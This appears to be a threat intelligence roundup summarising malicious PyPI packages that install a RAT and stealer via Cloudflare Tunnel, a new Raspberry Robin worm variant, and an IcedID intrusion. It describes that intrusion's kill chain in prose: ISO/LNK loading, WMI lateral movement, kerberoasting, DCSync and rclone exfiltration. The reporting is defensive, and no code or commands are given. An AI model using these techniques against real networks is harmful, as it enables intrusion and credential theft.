CTI Roundup: Malicious PyPI Packages Bypass Firewalls
PyPI packages use Cloudflare tunnels to bypass firewalls, new Raspberry Robin malware variant targets financial institutions in Portugal and Spain, and IcedID malware strikes again
In this week’s Roundup, CTI kicks off with an investigation into the discovery of six malicious packages on the Python Package Index (PyPI). Next up is a deep dive into recent reporting on the wormable Raspberry Robin malware framework, which is exhibiting significant improvements in functionality and appears to be following a new targeting pattern, as evidenced by its victimization of financial and insurance institutions in Europe. The Roundup wraps things up with CTI’s examination of a recent IcedID malware attack, in which the threat actor achieved Active Directory/domain compromise less than 24 hours after gaining initial access.
1. Malicious PyPI packages use Cloudflare tunnels to sneak through firewalls
Phylum has discovered six malicious packages on the Python Package Index (PyPI), which is Python’s official third-party software repository. The packages were found to be installing remote access trojan (RAT) and information-stealing malware, while also using Cloudflare Tunnel to bypass firewall restrictions for remote access.
How the discovery unfolded
Phylum first flagged a package called pyrologin on December 22, 2022. At first glance, this package appeared to be standard Python malware aside from the fetching of a zip file and some strings containing PowerShell code. Then on December 28, they discovered a similar malicious package called easytimestamp. The next day, discorder and discord-dev were discovered, again with similarities to the original pyrologin. And finally, on December 31, researchers discovered style[.]py and pythonstyles – both of which were similar to the original discoveries.
The discovery of this and many similar malicious packages suggests this was not a one-off publication, but rather part of a larger attack.
The six malicious packages detected by Phylum have multiple downloads and have since been removed from PyPI:
- pyrologin – 165 downloads
- easytimestamp – 141 downloads
- discorder – 83 downloads
- discord-dev – 228 downloads
- style.py – 193 downloads
- pythonstyles – 130 downloads
Installing one of these malicious packages may lead to the following scenarios:
- The exfiltration of sensitive information
- Established persistence
- Installation of a keystroke logger
- Installation of a Cloudflare tunnel
- Initiation of a flask app, which is accessed by the attacker via the above tunnel
Why you should care
This malware is like “a RAT on steroids,” according to Phylum. It encompasses basic RAT capabilities built into a web GUI, with a remote desktop capability and stealer.
So, even if an attacker fails to establish persistence, or fails to get a remote desktop utility to work, the stealer portion will still exfiltrate the data it finds.
Analyst comments from Tanium’s Cyber Threat Intelligence Team
“Phylum’s findings are another example of how attackers are targeting open-source package repositories to stage supply chain style attacks, something that is likely to continue in the future.”
“What makes this instance more unique compared to some of the previously identified malicious open-source packages is the use of the legitimate Cloudflare Tunnel software to remotely access the compromised machine. Cloudflare Tunnel lets you secure and encrypt traffic to any kind of infrastructure without a publicly routable IP address and allows web servers to become publicly available through Cloudflare without configuring firewalls.”
“Phylum’s analysis is deeply technical and contains much more detail than outlined above if you are interested.”
2. New Raspberry Robin malware targets financial institutions in Portugal and Spain
Hackers are now leveraging the automated, “wormable” malware framework known as Raspberry Robin to target Spanish and Portuguese financial and insurance institutions.
This worm acts as a loader for other malware, and spreads to other devices within victim networks. According to Security Joes, Raspberry Robin is a “well-designed automated framework” that “allows attackers post-infection capabilities to evade detection, move laterally and leverage trusted cloud infrastructures of known data hosting providers such as Discord, Azure & Github…”
A look back at Raspberry Robin
CTI has been tracking Raspberry Robin since July 2022. Our research led us to a thorough analysis of the malware from Red Canary, which first observed the associated malicious activity cluster in September 2021.
At the time, the malware was described as a worm that is often installed via USB drive. Victimology included organizations with ties to technology and manufacturing. That same month, Microsoft tied Raspberry Robin to the notorious Russian cybercrime syndicate known as Evil Corp.
The latest on Raspberry Robin
According to The Record, Raspberry Robin still infects computers via compromised USB devices, so not much has changed with regard to the framework’s initial intrusion vector. However, Security Joes reports that the latest variant of the malware is more complex than previous iterations, which allows its operators to collect much more data from its targets.
The researchers from Security Joes go on to state that Raspberry Robin’s uniqueness lies in its heavy obfuscation and the difficulty involved in any attempts to statically disassemble the malware.
“It seems that developers were busy adding protections to their code to avoid security tools and the curious eyes of malware analysts,” the report says.
Its developers also apparently added another layer of encryption, so victim data is no longer viewable in plain text, but rather encrypted with the RC4 cipher. However, the researchers referenced above were undeterred, and in the two cases to which they responded this month, the undeterred analysts were able to “dissect the downloader from its parent wrapper and unveil the malware which pointed to the aforementioned Raspberry Robin framework.”
Analyst comments from Tanium’s Cyber Threat Intelligence Team
“The Raspberry Robin worm is an active part of a complex malware ecosystem, and its list of victims is becoming increasingly diverse. Its framework has been used to target organizations all over the world, enabling intrusions into networks belonging to entities with ties to technology, manufacturing, telecoms, government, and now finance and insurance.”
“According to Microsoft, in October 2022 alone, nearly 3,000 devices in almost 1,000 organizations received at least one Raspberry Robin payload-related alert. Taking all this into account — as well as the fact that it seems to be under constant development and subjected to frequent updates — Raspberry Robin has clearly become a world-class threat. ”
“While Raspberry Robin seemed to have no purpose when it was first discovered, it has evolved and is heading towards providing a potentially devastating impact on environments where it’s still installed,” says a Microsoft Security Threat Intelligence report from October.”
“Raspberry Robin’s development will most likely continue well into 2023, and the framework will undoubtedly aid in facilitating further malware distribution and cybercrime activity.”
3. IcedID malware strikes again: Active Directory domain compromised in under 24 hours
IcedID malware, also sometimes referred to as BokBot, has been around since at least 2017. It is historically known to be a banking trojan used to steal financial information from its victims. More recently, IcedID is being leveraged as a dropper for other malware families and as a tool for initial access brokers.
A recent Cybereason threat analysis dives into an IcedID malware attack, which enabled the threat actor to compromise the Active Directory domain of its target in under 24 hours after gaining initial access.
Attack details
Cybereason’s report breaks down the infection methods employed on the patient-zero machine which was used by the attackers to pivot for the rest of the attack.
At a high level, the victim opens an archive, clicks an ISO file which creates a virtual disk, clicks on an LNK file which drops a DLL, the DLL creates connections to IcedID domains, and the IcedID payload is loaded into the process.
Previously observed IcedID infections begin with the victim opening a password-protected zip file containing an ISO file. When the file is double-clicked, the ISO files will mount themselves as a read-only directory, containing a hidden folder and an LNK file. This hidden folder contains an obfuscated batch file and a DLL payload.
When the shortcut or LNK file is clicked, it will execute the batch file contained in the hidden directory. The batch file will call an executable to copy and drop the DLL into the temp directory where it will be executed.
Technical details
Lateral movement: The attacker appears to follow a standard process regarding lateral movement. It first pivoted to another machine less than an hour after the initial infection and then used ping[.]exe to determine if the host was online or not. Wmic[.]exe was used to execute a remote DLL on the workstation.
After the attacker was established on the remote host, it executed a Cobalt Strike beacon, named gv[.]dll. This process was continued throughout the network, using ping[.]exe checking that hosts are online, moving laterally via WMI, and executing Cobalt Strike payloads for foothold. Cybereason observed the attacker being able to move laterally to an internal Windows Server due to compromised credentials via kerberoasting. The account had domain admin privileges.
Persistence: The attacker borrowed a technique from Conti in which is installed the AteraAgent RMM tool on multiple machines. Atera is a legitimate tool used for remote administration and was utilized by the Conti gang to regain persistent access to infected environments and avoid detection. The use of Atera allows the attacker to create an additional backdoor for themselves in case their initial persistence mechanisms are discovered and/or remediated. The command lines executed during the installation of the AteraAgent reveal a mistake made by the attacker — the misspelling of the outlook[.]it domain.
Credential theft: The first instance of credential theft occurred only 15 minutes after the initial infection via kerberoasting. Kerberoasting was used to pull the hashes of service accounts on the domain. After moving laterally to a file server and elevating privileges via services, the attacker then successfully executed a DCSync attack — an attack that allows the threat actor to impersonate a domain controller, requesting password hashes from other domain controllers. This allowed the attacker to ultimately compromise the domain.
Browser hooking: IcedID has a history of attempting to hook into browsers like Firefox or Chrome to try to steal credentials and cookies. Once the main bot was loaded, researchers observed hooking behavior within Chrome.
Discovery: The attack leveraged multiple different discovery commands that were executed as part of the “SysInfo” module of the IcedID bot. Net[.]exe was used to discover OS and AD information and ping[.]exe was used to discover if remote machines were online for lateral movement.
The attacker also used nltest[.]exe to extract AD information and PowerShell to find non-standard shares within the network. Lastly, the command “wuauclt.exe /detectnow” was executed to check for any missing updates and patches.
Network scanning: The legitimate netscan tool was leveraged to scan the network, writing the results of the scan to a local xml file. This is yet another technique that was borrowed from Conti.
Data exfiltration: The attacker was observed using renamed copies of the popular rclone file syncing software to encrypt and sync directories to the Mega file-sharing service. Rclone is becoming increasingly popular amongst threat actors, with even LockBit using it for data exfiltration.
Analyst comments from Tanium’s Cyber Threat Intelligence Team
“The ability of an attacker to compromise Active Directory in 24 hours is not entirely unheard of but does serve as a reminder of how quickly incidents can happen and how important it is to react to anomalous network activity in a timely manner. This attack also reiterates how common it is for threat actors and ransomware gangs to reuse/share (or, in some cases, simply steal) TTPs from each other, as evidenced by the threat actor’s repurposing of known Conti techniques, highlighted above.”
Do you have insight into these stories that you want to share? Head over to Tanium’s discussion forum to start a conversation.
For further reading, catch up on our recent cyber threat intelligence roundups.